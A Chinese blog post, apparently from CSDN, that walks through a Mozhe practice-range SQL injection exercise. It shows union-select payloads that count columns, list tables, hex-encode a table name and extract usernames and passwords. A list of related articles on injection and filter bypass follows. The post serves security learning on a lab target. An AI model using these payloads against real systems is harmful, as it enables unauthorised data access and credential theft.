SQL过滤字符后手工注入漏洞测试(第3题)

最新推荐文章于 2024-04-20 12:00:00 发布
最新推荐文章于 2024-04-20 12:00:00 发布
阅读量307 收藏
点赞数
分类专栏: sql注入 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47493074/article/details/127254004
版权

漏洞复现

首先是用order by 判断 多少列,但是吧,好像不管order by 多少都不会报错,这个应该就是这题的过滤了吧,然后我接着就用报错注入的方式去完成了

但事实上还可以再试试直接用 union select 1,2,3,4…然后到了union select 1,2,3,4,5,6,7发现了回显且不报行数不对的错

id=-1'union select 1,2,3,4,5,6,7 --'

在这里插入图片描述

' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema =database()),4,5,6,7 --'

在这里插入图片描述

列,这里你去查表的时候会发现不是我们熟悉的stormgroup_member,而是第一个长相奇特的表名,大概是为了给我们增加难度的,但是反正要用ASCLL编码前面加0x来绕过

' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name =0x2840646d696e395f746434627d),4,5,6,7 --'

在这里插入图片描述

然后就是找值,这里要注意俩点,一个是用完整的对应7列去找数据,不然会报列数不对的错误,一个是表名要用 反单引号括起来,不然会报错,就是这个特殊表名会闭合我们的语句导致的错误

' union select 1,2,(select group_concat(username,password) from `(@dmin9_td4b}`),4,5,6,7 --'

关于反单引号的知识点【原本是拿来防止把正常的字符当成保留字符,即 别把表名为select的表当成了执行代码select 】
在这里插入图片描述

Yolo山药
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL Injection绕过技巧
weixin_34261739的博客
08-15 1111
0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。 但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。 比如上面的 String sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数据库执行,...
墨者_SQL过滤字符手工注入漏洞测试(第3)
weixin_50698958的博客
10-12 365
靶场: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习搭建一个采购系统,为了安全起见,“墨者”对该系统做了部分防护措施,请你帮助他测试系统是否安全。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解MySQL的数据结构; 4、了解SQL注入常用注释字符; 5、了解sql注入常用绕过姿势; 解方向 手工进行SQL注入测试
墨者SQL过滤字符手工注入漏洞测试(第3)
wswr的博客
03-18 918
思路:首先试一下单引号先,发现报错,这里发现报错就能用报错注入的方式解决,具体操作看别的(用这种方法我是成功了),然后按照普通注入的正常玩法的话,发现注入点,判断这应该是字符型,然后试着闭合,发现也可以,欸,那就是正常注入了 总结:先判断注入点,注入类型,然后正常一套操作,order by不行就再试试select,(实在不行报错注入的方法也能做),然后就算遇到特殊字符的库名表名要注意用编码,还有反单引号的应用 ps:关于反单引号的知识点【原本是拿来防止把正常的字符当成保留字符,即 别把表名为sele
sql注入(三)绕过方法及防御手段
最新发布
wangluoanquan111的博客
04-20 857
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
sql注入原理
嘻嘻哈哈
02-23 2848
0x01sql注入原理 sql注入漏洞产生的原理是因为服务器对用户输入参数过滤不严格,将含有恶意代码的参数代入数据库查询语句中并执行。 0x02sql注入中常用的函数与语法 Group_concat():将select的查询结果全部显示出来,占一个显示位 select version():查询MySQL版本 select user():查询数据库用户名 select databas...
sql注入过滤关键字(union select等等)
没事我溜达
03-15 8319
今天来学习一下注入中关键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和注释,发现单引号即可完成闭合,--+作为注释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是关键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被注释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞...delete注入)、SQL过滤字符手工注入漏洞测试、延时注入(时间注入)等...
Python sql注入 过滤字符串的非法字符实例
09-17
主要介绍了Python sql注入 过滤字符串的非法字符实例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
防止xss和sql注入:JS特殊字符过滤正则
12-01
代码如下:function stripscript(s) { var ...]”) //格式 RegExp(“[在中间定义特殊过滤字符]”)var rs = “”; for (var i = 0; i < s.length; i++) { rs = rs+s.substr(i, 1).replace(pattern, ”); }return rs;}
SQL字符注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
9-Web安全——SQL注入WAF绕过之select及union过滤
网络安全
06-03 9783
1. select及union过滤绕过 真实的注入环境中一般无法通过网站的源代码进行安全审计的,那么在注入过程中我们就需要使用常见的SQL注入绕过技巧来帮助我们进行绕过WAF。 首先需要判断网页的注入类型,输入参数?id=1%0Aand%0A1=2,测试URL为: http://www.sqli.com/Less-27/?id=1%0Aand%0A1=2 页面返回的结果如下: 当我们输入id=1 and 1=2时,页面还是正常返回,说明这是一个字符注入。 然...
SQL注入绕过之过滤了‘as‘与无列名注入
NLost
06-03 1446
过滤了as时 当column被过滤的无列名注入 利用sys.schema_auto_increment_columns 新特性
数据库注入过滤总结
zhangshanfeng_的博客
06-17 853
数据库注入总结 文章目录数据库注入总结fuzzMYSQL基本语句万能密码报错注入盲注时间盲注绕过配合sprintfsqlmap文件操作waf绕过结构猜测 fuzz burp的爆破功能,使用wfuzz的sql字典 可以初步得知过滤的情况 MYSQL 基本语句 数据库名 SELECT database(); SELECT group_concat(schema_name) FROM informa...
『Java安全』SQL安全-ORDER BY注入
Ho1aAs‘s Blog
01-03 1713
# 原理 SQL中:ORDER BY执行排序后面需要指定列名,该列名是不能被引号包含的否则就会被认为是一个字符串。 而PrepareStatment使用占位符传递参数时,会用单引号包裹参数,因此不能使用预编译 所以使用ORDER BY要搭配字符串拼接上列名
SQL注入漏洞(2)注入方法2 union联合注入
weixin_51339377的博客
03-18 1625
1.估算目标的数据库语法(可能性很多) select username,password from tablex where id=' 2\' limit 0,1 select username,password from tablex where id=2 limit 0,1 select username,password from tablex where id=(2) limit 0,1 2.黑客需要破坏数据库语句目的是为了知道数据库的闭合方式 一旦出现报错即破环成功 这个世界上...
SQL注入绕过select过滤
qq_43596950的博客
03-25 4401
目出自攻防世界收录的2019强网杯,官网已有writer up,此博文仅个人的做笔记 原目链接:adworld.xctf.org.cn select被过滤可以考虑使用show显示表名和列名 http://ip:port/?inject= ';show databases;show tables;show columns from table; alter更改表名,利用源代码中的select进行查询 alter语句: ALTER TABLE 表名 CHANGE COLUMN 列名 【新】列名
mysql 过滤单引号 注入_过滤单引证明过滤单引号的ORDER BY可以注入
weixin_32683881的博客
01-19 477
已知:代码如下,有注入无悬念。$sortColumn = mysqli_real_escape_string($_GET['sort_column']);$query ="SELECT * from cr0_3WHERE active = true ORDER BY $sortColumn DESC";?>推理:1.可以测试通过手段判断cr0_3的字段数量。不知道怎么做,就不要往下看了。2...
sql 过滤 绕过
m0_59855041的博客
06-14 545
20%0a%a0%09%0C%0D%0B()/**/
SQL注入漏洞(7)SQL注入高级篇
weixin_51339377的博客
03-18 1344
分析目标防火墙并且跳过 1.直接拉黑ip类防火墙 2.过滤删除相应字符的防火墙 1.waf注释符号过滤Sqli-labs T23 特点:注释符 --+ # 被过滤掉了 绕过方法:逻辑上补全闭合即可 多加一次url编码只是更安全的绕过 select * from users where id = '' limit 0,1 select * from users where id = ' -1' union select 1,2,'3 ' limit 0...
sql手工注入漏洞测试(mysql数据库-字符型)
06-28
SQL手工注入漏洞测试通常是通过构造恶意输入来测试数据库系统的安全性,以检测可能存在的漏洞。在针对MySQL数据库字符注入测试中,攻击者会尝试利用输入表单中的字符型数据来破坏SQL语句的可靠性,进而获取对...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值